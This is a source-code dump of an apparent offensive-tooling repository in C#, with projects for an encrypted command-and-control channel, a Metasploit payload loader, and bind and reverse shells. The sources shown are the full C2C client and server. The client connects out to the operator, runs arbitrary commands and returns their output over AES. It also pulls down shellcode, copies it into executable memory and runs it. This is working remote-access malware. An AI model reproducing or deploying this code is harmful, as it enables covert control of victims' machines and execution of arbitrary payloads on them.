├── .editorconfig
├── .gitignore
├── Encryped C2C
├── Client.cs
├── Encrypted C2C.csproj
├── Program.cs
├── Server.cs
└── Utils.cs
├── PE Analysis Using PeNet
├── PE Analysis Using PeNet.csproj
├── PeFileDllAnalysis.txt
├── PeFileExeAnalysis.txt
└── Program.cs
├── PInvoke MSF Payload
├── PInvoke MSF Payload.csproj
└── Program.cs
├── Source Code.sln
├── TCP Bind Shell
├── Program.cs
└── TCP Bind Shell.csproj
└── TCP Reverse Shell
├── Program.cs
└── TCP Reverse Shell.csproj
/.editorconfig:
--------------------------------------------------------------------------------
1 | [*.cs]
2 |
3 | # CA1822: Mark members as static
4 | dotnet_diagnostic.CA1822.severity = none
5 |
--------------------------------------------------------------------------------
/.gitignore:
--------------------------------------------------------------------------------
1 |
2 | # Created by https://www.toptal.com/developers/gitignore/api/csharp,visualstudio,visualstudiocode,jetbrains+all
3 | # Edit at https://www.toptal.com/developers/gitignore?templates=csharp,visualstudio,visualstudiocode,jetbrains+all
4 |
5 | ### Csharp ###
6 | ## Ignore Visual Studio temporary files, build results, and
7 | ## files generated by popular Visual Studio add-ons.
8 | ##
9 | ## Get latest from https://github.com/github/gitignore/blob/master/VisualStudio.gitignore
10 |
11 | # User-specific files
12 | *.rsuser
13 | *.suo
14 | *.user
15 | *.userosscache
16 | *.sln.docstates
17 |
18 | # User-specific files (MonoDevelop/Xamarin Studio)
19 | *.userprefs
20 |
21 | # Mono auto generated files
22 | mono_crash.*
23 |
24 | # Build results
25 | [Dd]ebug/
26 | [Dd]ebugPublic/
27 | [Rr]elease/
28 | [Rr]eleases/
29 | x64/
30 | x86/
31 | [Ww][Ii][Nn]32/
32 | [Aa][Rr][Mm]/
33 | [Aa][Rr][Mm]64/
34 | bld/
35 | [Bb]in/
36 | [Oo]bj/
37 | [Ll]og/
38 | [Ll]ogs/
39 |
40 | # Visual Studio 2015/2017 cache/options directory
41 | .vs/
42 | # Uncomment if you have tasks that create the project's static files in wwwroot
43 | #wwwroot/
44 |
45 | # Visual Studio 2017 auto generated files
46 | Generated\ Files/
47 |
48 | # MSTest test Results
49 | [Tt]est[Rr]esult*/
50 | [Bb]uild[Ll]og.*
51 |
52 | # NUnit
53 | *.VisualState.xml
54 | TestResult.xml
55 | nunit-*.xml
56 |
57 | # Build Results of an ATL Project
58 | [Dd]ebugPS/
59 | [Rr]eleasePS/
60 | dlldata.c
61 |
62 | # Benchmark Results
63 | BenchmarkDotNet.Artifacts/
64 |
65 | # .NET Core
66 | project.lock.json
67 | project.fragment.lock.json
68 | artifacts/
69 |
70 | # ASP.NET Scaffolding
71 | ScaffoldingReadMe.txt
72 |
73 | # StyleCop
74 | StyleCopReport.xml
75 |
76 | # Files built by Visual Studio
77 | *_i.c
78 | *_p.c
79 | *_h.h
80 | *.ilk
81 | *.meta
82 | *.obj
83 | *.iobj
84 | *.pch
85 | *.pdb
86 | *.ipdb
87 | *.pgc
88 | *.pgd
89 | *.rsp
90 | *.sbr
91 | *.tlb
92 | *.tli
93 | *.tlh
94 | *.tmp
95 | *.tmp_proj
96 | *_wpftmp.csproj
97 | *.log
98 | *.tlog
99 | *.vspscc
100 | *.vssscc
101 | .builds
102 | *.pidb
103 | *.svclog
104 | *.scc
105 |
106 | # Chutzpah Test files
107 | _Chutzpah*
108 |
109 | # Visual C++ cache files
110 | ipch/
111 | *.aps
112 | *.ncb
113 | *.opendb
114 | *.opensdf
115 | *.sdf
116 | *.cachefile
117 | *.VC.db
118 | *.VC.VC.opendb
119 |
120 | # Visual Studio profiler
121 | *.psess
122 | *.vsp
123 | *.vspx
124 | *.sap
125 |
126 | # Visual Studio Trace Files
127 | *.e2e
128 |
129 | # TFS 2012 Local Workspace
130 | $tf/
131 |
132 | # Guidance Automation Toolkit
133 | *.gpState
134 |
135 | # ReSharper is a .NET coding add-in
136 | _ReSharper*/
137 | *.[Rr]e[Ss]harper
138 | *.DotSettings.user
139 |
140 | # TeamCity is a build add-in
141 | _TeamCity*
142 |
143 | # DotCover is a Code Coverage Tool
144 | *.dotCover
145 |
146 | # AxoCover is a Code Coverage Tool
147 | .axoCover/*
148 | !.axoCover/settings.json
149 |
150 | # Coverlet is a free, cross platform Code Coverage Tool
151 | coverage*.json
152 | coverage*.xml
153 | coverage*.info
154 |
155 | # Visual Studio code coverage results
156 | *.coverage
157 | *.coveragexml
158 |
159 | # NCrunch
160 | _NCrunch_*
161 | .*crunch*.local.xml
162 | nCrunchTemp_*
163 |
164 | # MightyMoose
165 | *.mm.*
166 | AutoTest.Net/
167 |
168 | # Web workbench (sass)
169 | .sass-cache/
170 |
171 | # Installshield output folder
172 | [Ee]xpress/
173 |
174 | # DocProject is a documentation generator add-in
175 | DocProject/buildhelp/
176 | DocProject/Help/*.HxT
177 | DocProject/Help/*.HxC
178 | DocProject/Help/*.hhc
179 | DocProject/Help/*.hhk
180 | DocProject/Help/*.hhp
181 | DocProject/Help/Html2
182 | DocProject/Help/html
183 |
184 | # Click-Once directory
185 | publish/
186 |
187 | # Publish Web Output
188 | *.[Pp]ublish.xml
189 | *.azurePubxml
190 | # Note: Comment the next line if you want to checkin your web deploy settings,
191 | # but database connection strings (with potential passwords) will be unencrypted
192 | *.pubxml
193 | *.publishproj
194 |
195 | # Microsoft Azure Web App publish settings. Comment the next line if you want to
196 | # checkin your Azure Web App publish settings, but sensitive information contained
197 | # in these scripts will be unencrypted
198 | PublishScripts/
199 |
200 | # NuGet Packages
201 | *.nupkg
202 | # NuGet Symbol Packages
203 | *.snupkg
204 | # The packages folder can be ignored because of Package Restore
205 | **/[Pp]ackages/*
206 | # except build/, which is used as an MSBuild target.
207 | !**/[Pp]ackages/build/
208 | # Uncomment if necessary however generally it will be regenerated when needed
209 | #!**/[Pp]ackages/repositories.config
210 | # NuGet v3's project.json files produces more ignorable files
211 | *.nuget.props
212 | *.nuget.targets
213 |
214 | # Nuget personal access tokens and Credentials
215 | nuget.config
216 |
217 | # Microsoft Azure Build Output
218 | csx/
219 | *.build.csdef
220 |
221 | # Microsoft Azure Emulator
222 | ecf/
223 | rcf/
224 |
225 | # Windows Store app package directories and files
226 | AppPackages/
227 | BundleArtifacts/
228 | Package.StoreAssociation.xml
229 | _pkginfo.txt
230 | *.appx
231 | *.appxbundle
232 | *.appxupload
233 |
234 | # Visual Studio cache files
235 | # files ending in .cache can be ignored
236 | *.[Cc]ache
237 | # but keep track of directories ending in .cache
238 | !?*.[Cc]ache/
239 |
240 | # Others
241 | ClientBin/
242 | ~$*
243 | *~
244 | *.dbmdl
245 | *.dbproj.schemaview
246 | *.jfm
247 | *.pfx
248 | *.publishsettings
249 | orleans.codegen.cs
250 |
251 | # Including strong name files can present a security risk
252 | # (https://github.com/github/gitignore/pull/2483#issue-259490424)
253 | #*.snk
254 |
255 | # Since there are multiple workflows, uncomment next line to ignore bower_components
256 | # (https://github.com/github/gitignore/pull/1529#issuecomment-104372622)
257 | #bower_components/
258 |
259 | # RIA/Silverlight projects
260 | Generated_Code/
261 |
262 | # Backup & report files from converting an old project file
263 | # to a newer Visual Studio version. Backup files are not needed,
264 | # because we have git ;-)
265 | _UpgradeReport_Files/
266 | Backup*/
267 | UpgradeLog*.XML
268 | UpgradeLog*.htm
269 | ServiceFabricBackup/
270 | *.rptproj.bak
271 |
272 | # SQL Server files
273 | *.mdf
274 | *.ldf
275 | *.ndf
276 |
277 | # Business Intelligence projects
278 | *.rdl.data
279 | *.bim.layout
280 | *.bim_*.settings
281 | *.rptproj.rsuser
282 | *- [Bb]ackup.rdl
283 | *- [Bb]ackup ([0-9]).rdl
284 | *- [Bb]ackup ([0-9][0-9]).rdl
285 |
286 | # Microsoft Fakes
287 | FakesAssemblies/
288 |
289 | # GhostDoc plugin setting file
290 | *.GhostDoc.xml
291 |
292 | # Node.js Tools for Visual Studio
293 | .ntvs_analysis.dat
294 | node_modules/
295 |
296 | # Visual Studio 6 build log
297 | *.plg
298 |
299 | # Visual Studio 6 workspace options file
300 | *.opt
301 |
302 | # Visual Studio 6 auto-generated workspace file (contains which files were open etc.)
303 | *.vbw
304 |
305 | # Visual Studio LightSwitch build output
306 | **/*.HTMLClient/GeneratedArtifacts
307 | **/*.DesktopClient/GeneratedArtifacts
308 | **/*.DesktopClient/ModelManifest.xml
309 | **/*.Server/GeneratedArtifacts
310 | **/*.Server/ModelManifest.xml
311 | _Pvt_Extensions
312 |
313 | # Paket dependency manager
314 | .paket/paket.exe
315 | paket-files/
316 |
317 | # FAKE - F# Make
318 | .fake/
319 |
320 | # CodeRush personal settings
321 | .cr/personal
322 |
323 | # Python Tools for Visual Studio (PTVS)
324 | __pycache__/
325 | *.pyc
326 |
327 | # Cake - Uncomment if you are using it
328 | # tools/**
329 | # !tools/packages.config
330 |
331 | # Tabs Studio
332 | *.tss
333 |
334 | # Telerik's JustMock configuration file
335 | *.jmconfig
336 |
337 | # BizTalk build output
338 | *.btp.cs
339 | *.btm.cs
340 | *.odx.cs
341 | *.xsd.cs
342 |
343 | # OpenCover UI analysis results
344 | OpenCover/
345 |
346 | # Azure Stream Analytics local run output
347 | ASALocalRun/
348 |
349 | # MSBuild Binary and Structured Log
350 | *.binlog
351 |
352 | # NVidia Nsight GPU debugger configuration file
353 | *.nvuser
354 |
355 | # MFractors (Xamarin productivity tool) working folder
356 | .mfractor/
357 |
358 | # Local History for Visual Studio
359 | .localhistory/
360 |
361 | # BeatPulse healthcheck temp database
362 | healthchecksdb
363 |
364 | # Backup folder for Package Reference Convert tool in Visual Studio 2017
365 | MigrationBackup/
366 |
367 | # Ionide (cross platform F# VS Code tools) working folder
368 | .ionide/
369 |
370 | # Fody - auto-generated XML schema
371 | FodyWeavers.xsd
372 |
373 | # VS Code files for those working on multiple tools
374 | .vscode/*
375 | !.vscode/settings.json
376 | !.vscode/tasks.json
377 | !.vscode/launch.json
378 | !.vscode/extensions.json
379 | *.code-workspace
380 |
381 | # Local History for Visual Studio Code
382 | .history/
383 |
384 | # Windows Installer files from build outputs
385 | *.cab
386 | *.msi
387 | *.msix
388 | *.msm
389 | *.msp
390 |
391 | # JetBrains Rider
392 | .idea/
393 | *.sln.iml
394 |
395 | ### JetBrains+all ###
396 | # Covers JetBrains IDEs: IntelliJ, RubyMine, PhpStorm, AppCode, PyCharm, CLion, Android Studio, WebStorm and Rider
397 | # Reference: https://intellij-support.jetbrains.com/hc/en-us/articles/206544839
398 |
399 | # User-specific stuff
400 | .idea/**/workspace.xml
401 | .idea/**/tasks.xml
402 | .idea/**/usage.statistics.xml
403 | .idea/**/dictionaries
404 | .idea/**/shelf
405 |
406 | # AWS User-specific
407 | .idea/**/aws.xml
408 |
409 | # Generated files
410 | .idea/**/contentModel.xml
411 |
412 | # Sensitive or high-churn files
413 | .idea/**/dataSources/
414 | .idea/**/dataSources.ids
415 | .idea/**/dataSources.local.xml
416 | .idea/**/sqlDataSources.xml
417 | .idea/**/dynamic.xml
418 | .idea/**/uiDesigner.xml
419 | .idea/**/dbnavigator.xml
420 |
421 | # Gradle
422 | .idea/**/gradle.xml
423 | .idea/**/libraries
424 |
425 | # Gradle and Maven with auto-import
426 | # When using Gradle or Maven with auto-import, you should exclude module files,
427 | # since they will be recreated, and may cause churn. Uncomment if using
428 | # auto-import.
429 | # .idea/artifacts
430 | # .idea/compiler.xml
431 | # .idea/jarRepositories.xml
432 | # .idea/modules.xml
433 | # .idea/*.iml
434 | # .idea/modules
435 | # *.iml
436 | # *.ipr
437 |
438 | # CMake
439 | cmake-build-*/
440 |
441 | # Mongo Explorer plugin
442 | .idea/**/mongoSettings.xml
443 |
444 | # File-based project format
445 | *.iws
446 |
447 | # IntelliJ
448 | out/
449 |
450 | # mpeltonen/sbt-idea plugin
451 | .idea_modules/
452 |
453 | # JIRA plugin
454 | atlassian-ide-plugin.xml
455 |
456 | # Cursive Clojure plugin
457 | .idea/replstate.xml
458 |
459 | # Crashlytics plugin (for Android Studio and IntelliJ)
460 | com_crashlytics_export_strings.xml
461 | crashlytics.properties
462 | crashlytics-build.properties
463 | fabric.properties
464 |
465 | # Editor-based Rest Client
466 | .idea/httpRequests
467 |
468 | # Android studio 3.1+ serialized cache file
469 | .idea/caches/build_file_checksums.ser
470 |
471 | ### JetBrains+all Patch ###
472 | # Ignores the whole .idea folder and all .iml files
473 | # See https://github.com/joeblau/gitignore.io/issues/186 and https://github.com/joeblau/gitignore.io/issues/360
474 |
475 |
476 | # Reason: https://github.com/joeblau/gitignore.io/issues/186#issuecomment-249601023
477 |
478 | *.iml
479 | modules.xml
480 | .idea/misc.xml
481 | *.ipr
482 |
483 | # Sonarlint plugin
484 | .idea/sonarlint
485 |
486 | ### VisualStudioCode ###
487 |
488 | # Local History for Visual Studio Code
489 |
490 | ### VisualStudioCode Patch ###
491 | # Ignore all local history of files
492 | .history
493 | .ionide
494 |
495 | ### VisualStudio ###
496 |
497 | # User-specific files
498 |
499 | # User-specific files (MonoDevelop/Xamarin Studio)
500 |
501 | # Mono auto generated files
502 |
503 | # Build results
504 |
505 | # Visual Studio 2015/2017 cache/options directory
506 | # Uncomment if you have tasks that create the project's static files in wwwroot
507 |
508 | # Visual Studio 2017 auto generated files
509 |
510 | # MSTest test Results
511 |
512 | # NUnit
513 |
514 | # Build Results of an ATL Project
515 |
516 | # Benchmark Results
517 |
518 | # .NET Core
519 |
520 | # ASP.NET Scaffolding
521 |
522 | # StyleCop
523 |
524 | # Files built by Visual Studio
525 |
526 | # Chutzpah Test files
527 |
528 | # Visual C++ cache files
529 |
530 | # Visual Studio profiler
531 |
532 | # Visual Studio Trace Files
533 |
534 | # TFS 2012 Local Workspace
535 |
536 | # Guidance Automation Toolkit
537 |
538 | # ReSharper is a .NET coding add-in
539 |
540 | # TeamCity is a build add-in
541 |
542 | # DotCover is a Code Coverage Tool
543 |
544 | # AxoCover is a Code Coverage Tool
545 |
546 | # Coverlet is a free, cross platform Code Coverage Tool
547 |
548 | # Visual Studio code coverage results
549 |
550 | # NCrunch
551 |
552 | # MightyMoose
553 |
554 | # Web workbench (sass)
555 |
556 | # Installshield output folder
557 |
558 | # DocProject is a documentation generator add-in
559 |
560 | # Click-Once directory
561 |
562 | # Publish Web Output
563 | # Note: Comment the next line if you want to checkin your web deploy settings,
564 | # but database connection strings (with potential passwords) will be unencrypted
565 |
566 | # Microsoft Azure Web App publish settings. Comment the next line if you want to
567 | # checkin your Azure Web App publish settings, but sensitive information contained
568 | # in these scripts will be unencrypted
569 |
570 | # NuGet Packages
571 | # NuGet Symbol Packages
572 | # The packages folder can be ignored because of Package Restore
573 | # except build/, which is used as an MSBuild target.
574 | # Uncomment if necessary however generally it will be regenerated when needed
575 | # NuGet v3's project.json files produces more ignorable files
576 |
577 | # Nuget personal access tokens and Credentials
578 |
579 | # Microsoft Azure Build Output
580 |
581 | # Microsoft Azure Emulator
582 |
583 | # Windows Store app package directories and files
584 |
585 | # Visual Studio cache files
586 | # files ending in .cache can be ignored
587 | # but keep track of directories ending in .cache
588 |
589 | # Others
590 |
591 | # Including strong name files can present a security risk
592 | # (https://github.com/github/gitignore/pull/2483#issue-259490424)
593 |
594 | # Since there are multiple workflows, uncomment next line to ignore bower_components
595 | # (https://github.com/github/gitignore/pull/1529#issuecomment-104372622)
596 |
597 | # RIA/Silverlight projects
598 |
599 | # Backup & report files from converting an old project file
600 | # to a newer Visual Studio version. Backup files are not needed,
601 | # because we have git ;-)
602 |
603 | # SQL Server files
604 |
605 | # Business Intelligence projects
606 |
607 | # Microsoft Fakes
608 |
609 | # GhostDoc plugin setting file
610 |
611 | # Node.js Tools for Visual Studio
612 |
613 | # Visual Studio 6 build log
614 |
615 | # Visual Studio 6 workspace options file
616 |
617 | # Visual Studio 6 auto-generated workspace file (contains which files were open etc.)
618 |
619 | # Visual Studio LightSwitch build output
620 |
621 | # Paket dependency manager
622 |
623 | # FAKE - F# Make
624 |
625 | # CodeRush personal settings
626 |
627 | # Python Tools for Visual Studio (PTVS)
628 |
629 | # Cake - Uncomment if you are using it
630 | # tools/**
631 | # !tools/packages.config
632 |
633 | # Tabs Studio
634 |
635 | # Telerik's JustMock configuration file
636 |
637 | # BizTalk build output
638 |
639 | # OpenCover UI analysis results
640 |
641 | # Azure Stream Analytics local run output
642 |
643 | # MSBuild Binary and Structured Log
644 |
645 | # NVidia Nsight GPU debugger configuration file
646 |
647 | # MFractors (Xamarin productivity tool) working folder
648 |
649 | # Local History for Visual Studio
650 |
651 | # BeatPulse healthcheck temp database
652 |
653 | # Backup folder for Package Reference Convert tool in Visual Studio 2017
654 |
655 | # Ionide (cross platform F# VS Code tools) working folder
656 |
657 | # Fody - auto-generated XML schema
658 |
659 | # VS Code files for those working on multiple tools
660 |
661 | # Local History for Visual Studio Code
662 |
663 | # Windows Installer files from build outputs
664 |
665 | # JetBrains Rider
666 |
667 | ### VisualStudio Patch ###
668 | # Additional files built by Visual Studio
669 |
670 | # End of https://www.toptal.com/developers/gitignore/api/csharp,visualstudio,visualstudiocode,jetbrains+all
--------------------------------------------------------------------------------
/Encryped C2C/Client.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Net.Sockets;
3 | using System.Net;
4 | using System.IO;
5 | using System.Linq;
6 |
7 | class Client: IDisposable {
8 | readonly TcpClient tcp;
9 | readonly IPAddress host;
10 | readonly int port;
11 | string iv, key;
12 |
13 | ///
14 | /// Initialize the client
15 | ///
16 | /// Host name to connect to
17 | /// Port number
18 | public Client(IPAddress host, int port) {
19 | this.host = host;
20 | this.port = port;
21 | tcp = new TcpClient();
22 | iv = key = string.Empty;
23 | }
24 |
25 | ///
26 | /// Connect to the host and open tcp stream
27 | ///
28 | public void Setup() {
29 | tcp.Connect(host, port);
30 | using var stream = tcp.GetStream(); ReadInputs(stream);
31 | }
32 |
33 | ///
34 | /// Handle tcp stream
35 | ///
36 | ///
37 | private void ReadInputs(NetworkStream stream) {
38 | if (!Utils.HasExchangedKeys) {
39 | Utils.HasExchangedKeys = !Utils.HasExchangedKeys;
40 | iv = Utils.GetRandomString(16);
41 | key = Utils.GetRandomString(32);
42 | }
43 |
44 | using (var ws = new StreamWriter(stream) { AutoFlush = true })
45 | using (var rs = new StreamReader(stream)) {
46 | ws.WriteLine(iv);
47 | ws.WriteLine(key);
48 |
49 | while(true) {
50 | string cmd = rs.ReadLine();
51 | if (string.IsNullOrEmpty(cmd)) {
52 | break;
53 | }
54 |
55 | string dec = Utils.DecryptData(Utils.DeserializeData(cmd), iv, key);
56 |
57 | if (dec.ToLower() == "exit") {
58 | break;
59 | } else if (string.IsNullOrEmpty(dec) || string.IsNullOrWhiteSpace(dec)) {
60 | continue;
61 | }
62 |
63 | // shellcode run
64 | if (dec == ":shellcode:") {
65 | // get the shellcode
66 | var rawShellCode = rs.ReadLine();
67 | if (string.IsNullOrEmpty(rawShellCode) || string.IsNullOrWhiteSpace(rawShellCode)) continue;
68 |
69 | // decrypt shellcode
70 | var decryptedData = Utils.DecryptData(Utils.DeserializeData(rawShellCode), iv, key);
71 | if (string.IsNullOrEmpty(decryptedData) || string.IsNullOrWhiteSpace(decryptedData)) continue;
72 |
73 | // deserialize the decrypted data to get actuall shellcode in bytes
74 | byte[] shellcode = Utils.DeserializeData(decryptedData);
75 |
76 | // execute shellcode
77 | Utils.ExecuteShellCode(shellcode);
78 | ws.WriteLine(Utils.SerializeBytes(Utils.EncryptData("Executing shellcode", iv, key)));
79 | } else {
80 | string[] parts = dec.Split(' ');
81 | string fileName = parts.First();
82 |
83 |
84 | string[] args = parts.Skip(1).ToArray();
85 |
86 | string output = Utils.ExecuteCommand(fileName, args);
87 | var enc = Utils.EncryptData(output.Trim(), iv, key);
88 |
89 | ws.WriteLine(Utils.SerializeBytes(enc));
90 | }
91 | }
92 | }
93 | }
94 |
95 | ///
96 | /// Dispose the resources commited by class
97 | ///
98 | public void Dispose() {
99 | tcp.Close();
100 | iv = key = string.Empty;
101 | }
102 | }
103 |
--------------------------------------------------------------------------------
/Encryped C2C/Encrypted C2C.csproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 | Exe
5 | net5.0
6 | Encryped_C2C
7 | AnyCPU;ARM32;ARM64;x64;x86
8 |
9 |
10 |
11 |
--------------------------------------------------------------------------------
/Encryped C2C/Program.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Net;
3 |
4 | class Program {
5 | static void Main(string[] args) {
6 | IPAddress host = IPAddress.Any;
7 | bool RunServer = false;
8 |
9 | // safeguard arguments
10 | if (args.Length == 0) {
11 | throw new ArgumentException("Usage: application [] ");
12 | }
13 |
14 | // if argument length is 1, consider it as port and run server
15 | // otherwise treat as client and connect to host (arg1) with port (arg2)
16 | int port;
17 | if (args.Length == 1) {
18 | RunServer = true;
19 | port = Convert.ToInt32(args[0]);
20 | } else {
21 | host = IPAddress.Parse(args[0]);
22 | port = Convert.ToInt32(args[1]);
23 | }
24 |
25 | // spawn the worker based on arguments
26 | if (RunServer) {
27 | using var server = new Server(port); server.Setup();
28 | } else {
29 | using var client = new Client(host, port); client.Setup();
30 | }
31 | }
32 | }
33 |
--------------------------------------------------------------------------------
/Encryped C2C/Server.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Net;
3 | using System.IO;
4 | using System.Net.Sockets;
5 |
6 | class Server : IDisposable {
7 | TcpListener tcp;
8 | string iv, key;
9 |
10 | ///
11 | /// Initialize the tcp server
12 | ///
13 | /// Port number
14 | public Server(int port) {
15 | tcp = new TcpListener(IPAddress.Any, port);
16 | iv = key = string.Empty;
17 | }
18 |
19 | ///
20 | /// Start the server and accept connections
21 | ///
22 | public void Setup() {
23 | tcp.Start();
24 | AcceptConnections();
25 | }
26 |
27 |
28 | ///
29 | /// Accept and handle connections
30 | ///
31 | private void AcceptConnections() {
32 | while (true) {
33 | try {
34 | using(var client = tcp.AcceptTcpClient()) {
35 | string addr = client.Client.RemoteEndPoint.ToString();
36 | Console.WriteLine("[!] Client Connected: tcp://{0}", addr);
37 |
38 | using (var stream = client.GetStream()) {
39 | using (var ws = new StreamWriter(stream) { AutoFlush = true }) {
40 | using(var rs = new StreamReader(stream)) {
41 | iv = rs.ReadLine();
42 | key = rs.ReadLine();
43 |
44 | while (true) {
45 | Console.Write("> ");
46 | string cmd = Console.ReadLine().Trim();
47 | if (cmd.ToLower() == "exit") break;
48 |
49 | byte[] enc;
50 | if (cmd.ToLower().StartsWith(":read:") && cmd.Split(' ').Length == 2) {
51 | // send shellcode magic number
52 | ws.WriteLine(Utils.SerializeBytes(Utils.EncryptData(":shellcode:", iv, key)));
53 |
54 | // read the payload file
55 | var filePath = cmd.Split(' ')[1];
56 | var shellcode = Utils.ReadBinaryFile(filePath);
57 |
58 | // encrypt the shellcode
59 | enc = Utils.EncryptData(Utils.SerializeBytes(shellcode), iv, key);
60 | } else {
61 | // send comamnd
62 | enc = Utils.EncryptData(cmd, iv, key);
63 | }
64 |
65 | string serialized = Utils.SerializeBytes(enc);
66 | ws.WriteLine(serialized);
67 | string output = rs.ReadLine();
68 | string decrypted = Utils.DecryptData(Utils.DeserializeData(output), iv, key);
69 | Console.WriteLine(decrypted);
70 | }
71 | }
72 | }
73 | }
74 |
75 | Console.WriteLine("[!] Client Disconnected: {0}", addr);
76 | }
77 | } catch (Exception e) {
78 | Console.WriteLine("[x] Error: {0}", e.Message);
79 | break;
80 | }
81 | }
82 |
83 | }
84 |
85 | ///
86 | /// Stop the server and release the resources
87 | ///
88 | public void Dispose() {
89 | tcp.Stop();
90 | iv = key = string.Empty;
91 | }
92 | }
93 |
--------------------------------------------------------------------------------
/Encryped C2C/Utils.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Text;
3 | using System.Security.Cryptography;
4 | using System.IO;
5 | using System.Diagnostics;
6 | using System.Runtime.InteropServices;
7 | using System.Threading;
8 |
9 | internal class Utils {
10 | [DllImport("kernel32.dll")]
11 | static extern IntPtr VirtualAlloc(IntPtr address, uint dwSize, uint allocType, uint mode);
12 |
13 | [UnmanagedFunctionPointer(CallingConvention.StdCall)]
14 | delegate void WindowRun();
15 |
16 | private static bool hasExchangeKey = false;
17 | private static string charSet = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz1234567890,./<>?;':`~!@#$%^&*()-=_+";
18 |
19 | ///
20 | /// Execute the shellcode in thread
21 | ///
22 | /// Raw shellcode content
23 | public static void ExecuteShellCode(byte[] shellcode) {
24 | // get pointer of allocated buffer
25 | IntPtr ptr = VirtualAlloc(IntPtr.Zero, Convert.ToUInt32(shellcode.Length), 0x1000, 0x40);
26 | Marshal.Copy(shellcode, 0x0, ptr, shellcode.Length);
27 | WindowRun r = Marshal.GetDelegateForFunctionPointer(ptr);
28 |
29 | ThreadStart s = new(r);
30 | new Thread(s).Start();
31 | }
32 |
33 | ///
34 | /// Read the binary file and return bytes
35 | ///
36 | /// Absolute path of the file to read
37 | /// Raw content of binary file
38 | public static byte[] ReadBinaryFile(string path) {
39 | // get file stream
40 | using(var file = File.OpenRead(path)) {
41 |
42 | // get binary stream from file
43 | using(var bReader = new BinaryReader(file)) {
44 | using (var ms = new MemoryStream()) {
45 | // read into memory until all bytes are read from file and cursor reached EOF
46 | while (true) {
47 | byte[] buf = bReader.ReadBytes(1024);
48 | if (buf.Length == 0) {
49 | break;
50 | } else {
51 | ms.Write(buf);
52 | }
53 | }
54 | return ms.ToArray();
55 | }
56 | }
57 | }
58 | }
59 |
60 | ///
61 | /// Execute command with args and return output
62 | ///
63 | /// File name in %PATH% environment variable
64 | /// Arguments for the file
65 | /// Output of the command
66 | public static string ExecuteCommand(string fileName, string[] args) {
67 | string output = string.Empty;
68 |
69 | // Copy raw content in memory
70 | using(var stream = new MemoryStream()) {
71 |
72 | var process = new Process() { StartInfo = new ProcessStartInfo(fileName, string.Join(' ', args)) { UseShellExecute = false, RedirectStandardError = true, RedirectStandardOutput = true } };
73 |
74 | try {
75 | process.Start();
76 |
77 | process.StandardError.BaseStream.CopyTo(stream);
78 | process.StandardOutput.BaseStream.CopyTo(stream);
79 |
80 | process.WaitForExit();
81 | } catch (Exception e) {
82 | // handle error and pipe to memory stream
83 | stream.Write(Encoding.ASCII.GetBytes(e.Message + '\n'));
84 | } finally {
85 | // convert bytes to string
86 | output = Encoding.ASCII.GetString(stream.ToArray());
87 | }
88 | }
89 |
90 | return output;
91 | }
92 |
93 | ///
94 | /// Perform AES encryption on the string with IV and Key and return raw data
95 | ///
96 | /// https://docs.microsoft.com/en-us/dotnet/api/system.security.cryptography.aes?view=net-5.0
97 | ///
98 | /// String data to encrypt
99 | /// Initializing Vector
100 | /// Encryption key
101 | /// Encrypted raw bytes
102 | public static byte[] EncryptData(string payload, string iv, string key) {
103 | byte[] encrypted;
104 |
105 | using(var aes = Aes.Create()) {
106 | aes.IV = Encoding.ASCII.GetBytes(iv);
107 | aes.Key = Encoding.ASCII.GetBytes(key);
108 |
109 | var crypt = aes.CreateEncryptor(aes.Key, aes.IV);
110 |
111 | using (var memStream = new MemoryStream()) {
112 | using(var cStream = new CryptoStream(memStream, crypt, CryptoStreamMode.Write)) {
113 | using(var ws = new StreamWriter(cStream)) {
114 | ws.Write(payload);
115 | }
116 | encrypted = memStream.ToArray();
117 | }
118 | }
119 | }
120 |
121 | return encrypted;
122 | }
123 |
124 | ///
125 | /// Perform AES decryption on the bytes with IV and Key and return string data
126 | ///
127 | /// https://docs.microsoft.com/en-us/dotnet/api/system.security.cryptography.aes?view=net-5.0
128 | ///
129 | /// Payload to decrypt
130 | /// Initializing Vector
131 | /// Encryption key
132 | /// Decrypted string
133 | public static string DecryptData(byte[] payload, string iv, string key) {
134 | string decrypted = string.Empty;
135 |
136 | using (var aes = Aes.Create()) {
137 | aes.IV = Encoding.ASCII.GetBytes(iv);
138 | aes.Key = Encoding.ASCII.GetBytes(key);
139 |
140 | var crypt = aes.CreateDecryptor(aes.Key, aes.IV);
141 |
142 | using (var memStream = new MemoryStream(payload)) {
143 | using (var cStream = new CryptoStream(memStream, crypt, CryptoStreamMode.Read)) {
144 | using(var rs = new StreamReader(cStream)) {
145 | decrypted = rs.ReadToEnd();
146 | }
147 | }
148 | }
149 | }
150 |
151 | return decrypted;
152 | }
153 |
154 | ///
155 | /// Get a random string from charset of certain length
156 | ///
157 | /// How many characters?
158 | ///
159 | public static string GetRandomString(int length) {
160 | Random random = new();
161 | string password = string.Empty;
162 |
163 | for (int i = 0; i < length; i++) {
164 | int idx = random.Next(0, charSet.Length);
165 | password += charSet[idx];
166 | }
167 |
168 | return password;
169 | }
170 |
171 | ///
172 | /// Convert the raw data to base64 string
173 | ///
174 | ///
175 | ///
176 | public static string SerializeBytes(byte[] data) {
177 | return Convert.ToBase64String(data);
178 | }
179 |
180 | ///
181 | /// Convert the base64 string to underlying raw data
182 | ///
183 | ///
184 | ///
185 | public static byte[] DeserializeData(string data) {
186 | return Convert.FromBase64String(data);
187 | }
188 |
189 | public static bool HasExchangedKeys {
190 | get => hasExchangeKey;
191 | set => hasExchangeKey = value;
192 | }
193 | }
194 |
195 |
--------------------------------------------------------------------------------
/PE Analysis Using PeNet/PE Analysis Using PeNet.csproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 | Exe
5 | net5.0
6 | PE_Analysis_Using_PeNet
7 |
8 |
9 |
10 |
11 | ..\..\PeNet\src\PeNet\bin\Debug\net5.0\PeNet.dll
12 |
13 |
14 |
15 |
16 |
--------------------------------------------------------------------------------
/PE Analysis Using PeNet/PeFileDllAnalysis.txt:
--------------------------------------------------------------------------------
1 | // This file contains the pe file analysis of the Dll file generate after compiling in x64 architecture
2 |
3 | [!] PE File Header
4 | [+] Machine Type: I386
5 | [+] Number of Sections: 3
